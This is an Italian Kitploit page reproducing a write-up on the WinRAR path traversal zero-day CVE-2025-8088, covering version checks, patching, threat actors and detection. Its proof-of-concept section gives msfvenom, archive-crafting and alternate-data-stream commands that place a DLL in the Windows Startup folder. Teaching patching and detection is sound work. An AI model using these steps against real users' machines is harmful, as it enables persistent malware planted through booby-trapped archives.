Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal — Una coinvolgente guida su come scoprire, correggere e proteggere WinRAR CVE-2025-8088 con un tocco pratico da hacker. | Kitploit
Strumenti/GitHubGitHub/adityabhatt3010/cve-2025-8088-winrar-zero-day-path-traversal
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebInformatica ForenseAnalisi MalwarePenetration TestingThreat IntelligenceApprendimento e FormazioneRisposta agli Incidenti
GitHubadityabhatt3010/cve-2025-8088-winrar-zero-day-path-traversal

CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal

Una coinvolgente guida su come scoprire, correggere e proteggere WinRAR CVE-2025-8088 con un tocco pratico da hacker.

Vedi Repository
12251 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-8088: Path Traversal Zero-Day di WinRAR — Da Zero a Pwn 🗿


Introduzione – Il “Vecchio Amico” Appena Colto in Fallo

WinRAR — il classico polveroso che tutti hanno installato ma nessuno aggiorna — è stato appena colpito da un zero-day ad alta gravità: CVE-2025-8088.

  • Gravità: CVSS v3.1 → 8.8 (Alta)
  • Sfruttato in natura da attori di minacce come RomCom (Storm-0978) e Paper Werewolf.
  • Patch in: WinRAR 7.13 (rilasciato il 30 luglio 2025).
  • Se sei su 7.12 o inferiore — sei un bersaglio facile.

La CISA ha addirittura inserito questo nel loro catalogo delle vulnerabilità note sfruttate, con una scadenza di correzione entro il 2 settembre 2025. Questa non è solo teoria — è fuoco vivo.

Copertina


Cos’è il Bug? 🧩

  • Tipo: Path Traversal (attraversamento di directory)
  • Colpo di scena: Utilizza Alternate Data Stream (ADS) per nascondere i payload
  • Impatto: File RAR maliziosi possono estrarre contenuti al di fuori della cartella prevista — pensa: ..\Startup\evil.dll
  • Risultato: Posizionamento arbitrario di file → persistenza → backdoor → città RAT.

Affetto: WinRAR per Windows (≤7.12), UnRAR.dll, Portable UnRAR Sicuri: Build Linux, Unix, Android.


Prima di Tutto — Sei Vulnerabile? 🕵️‍♂️

Prima di farti prendere dal panico o fare l'hacker, controlla la tua versione.

Come Controllare:

  • GUI: Apri WinRAR → Aiuto → Informazioni su WinRAR
  • CMD/Powershell:
root@kitploit:~
winget list WinRAR

(oppure esegui winrar.exe dalla sua directory di installazione)

  • Controllo DLL: Tasto destro su UnRAR.dll → Proprietà → Dettagli.

Quando ho iniziato a scrivere, ero su 7.10 — sì, maturo per la raccolta 🗿🐔🍗.

WinRAR_Version


Come Applicare la Patch (Prima che Qualcuno Applichi la Patch a Te) 🛡️

  1. Scarica l'ultima versione da: rarlab.com/download.htm
  2. Scegli 64-bit o 32-bit in base al tuo sistema.
  3. Esegui l'installer → sovrascriverà la tua vecchia build.
  4. Verifica: Aiuto → Informazioni su WinRAR → dovrebbe leggere 7.13 o superiore.
  5. Sostituisci UnRAR.dll negli strumenti dipendenti, se presenti.

WinRAR non si aggiorna automaticamente — imposta un promemoria sul calendario, non diventare un bersaglio statico.

WinRAR_Version_Updated

PS: Ignora la mia sfacciataggine sullo sfondo — dovevo farne un po' mostra! 😏


Sfruttamento in Natura ⚔️

  • RomCom (Storm-0978): Spear-phishing con esche per candidature lavorative, target legati all'Ucraina.
  • Paper Werewolf: Intervenuto poco dopo, colpendo organizzazioni russe.
  • Payload consegnati: SnipBot, RustyClaw, varianti di Mythic Agent.
  • File DLL/LNK dannosi lasciati in %TEMP% e nelle cartelle di avvio.
  • La CISA lo ha elencato il 12 agosto 2025 → scadenza: 2 settembre 2025.

Proof of Concept (PoC) – Solo in Laboratorio Controllato! 🧨

⚠ Disclaimer: Questo è solo per test di sicurezza educativi e autorizzati. Non andare in modalità gremlin 🗿.

Passo 1: Genera una DLL Maliziosa

root@kitploit:~
msfvenom -p windows/x64/exec CMD=calc.exe -f dll > evil.dll

Passo 2: Crea un RAR con Attraversamento

root@kitploit:~
winrar a -ep -ap"\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" payload.rar evil.dll

Passo 3: (Opzionale) Stealth ADS

root@kitploit:~
type evil.dll > legit.txt:evil.dll

Passo 4: Estrai con WinRAR Vulnerabile

Boom — evil.dll finisce in Startup. Al prossimo riavvio? Ciao calc.exe.

Workflow


Mitigazione e Caccia 🐺

  • Patch → WinRAR 7.13+

  • Cerca file .dll o .lnk sospetti in:

    • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
    • %TEMP%
  • Monitora ADS:

    root@kitploit:~
    streams.exe -s C:\
    
  • Regole IDS/IPS: segnala RAR con sequenze ..\.

  • Plugin Nessus/Qualys già disponibili.


Cronologia Chiave

  • 18 luglio 2025 – ESET scopre sfruttamento attivo
  • 30 luglio 2025 – Patch rilasciata (7.13)
  • 12 agosto 2025 – Aggiunto al catalogo KEV della CISA
  • 2 settembre 2025 – Scadenza obbligatoria per agenzie federali

Parole Finali – Patch o Perisci 🗿

Questa non era una vulnerabilità “forse-un-giorno” — è stata armata prima della divulgazione. Se sei ancora su 7.10 (come me quando scrivevo), fai il patch ora. Se fai parte del team red team, trattalo come un caso studio su come strumenti vecchi diventano nuovi vettori d'attacco.


Scarica lo strumento